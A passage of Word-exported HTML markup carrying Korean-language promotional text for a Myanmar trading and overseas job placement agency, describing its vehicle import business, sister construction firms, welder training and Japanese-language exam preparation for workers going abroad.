lang=\"KO\">기업들과</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">협력하여</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">경제통상자원부에서&nbsp;</span><span style=\"mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">차량</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">수입허가를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">신청했고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">각종</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">상용트럭</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">관광</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">산업 및</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">운송에</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사용되는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">다양한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">유형의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">버스</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">및</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기계를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일본에서</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직접</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">구매 판매하는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사업을</span><span style=\"mso-fareast-language:KO;\"> 25</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">년</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">이상&nbsp;</span><span style=\"mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">종사해</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">왔고 나라를 위한 정한 세금들을 냈습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">. </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">게다가</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">100 </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">명 이상의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직원에게</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">고용</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공했습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">또한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">쌍둥이</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">회사인</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>뉴코멧건설 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>, </strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>제야슈웨삐띡 건설 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>, </strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>아웅네원 회사</strong>들은 정부</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">부처로부터</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">입찰&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">(tender)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">받고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">건설</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">작업을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">하는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">동안</span><span style=\"mso-fareast-language:KO;\"> 200</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">명</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">이상의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직원에게</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">고용</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공했습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"> \"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">뉴코멧 해외 직업 소개회사</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">\"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">는 한국 조선소로 취업을 희망하는 미얀마 각지에서 온 소수민족 형제들을 교통통신부 산하의 씬마락</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"> (Sinmalike) </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">조선소에서 유능한 트레이너들와 함께 실력있는 용접공이 되도록 수업을 제공하고 있으며 관련 기업체로 취업할 수 있게 도와주고 있습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">.</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">또한</span><span style=\"mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">두바이</span><span style=\"mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">말레이시아</span><span style=\"mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">싱가포</span><span style=\"mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">태국</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일본 같은</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">국가에서</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일하기를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">원하는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">청년들에게</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">취업</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">받알 수 있도록&nbsp;</span><span style=\"mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스들을 제공하고 있습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"mso-fareast-language:KO;\">New Comet Trading Agency Co.ltd</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">미얀마의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">젊은</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">치누들이 일본의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">개발한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">첨단</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기술을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">배우고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">꿈을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">실현할</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">수</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있도록</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">필요한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">교육을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공하고 돕고 있습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일본으로 취업비자</span><span style=\"mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">연수비자로 가기</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위해</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">필요한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">자격시험</span><span style=\"mso-fareast-language:KO;\">(JLPT, JFT, NAT-TEST, TOP-J)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">에</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">합격할</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">수</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있도록</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">어학당도</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">개설</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">및 교육을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">지원하고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희는</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">”</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>뉴코멧</strong></span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>해외직업소개회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>”&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-bidi-font-weight:bold;mso-fareast-language:KO;\" lang=\"KO\">는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">미얀마에서</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">우수한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기능인력을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">배출하여</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">해외로</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">파견하는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공하기</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위해</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun 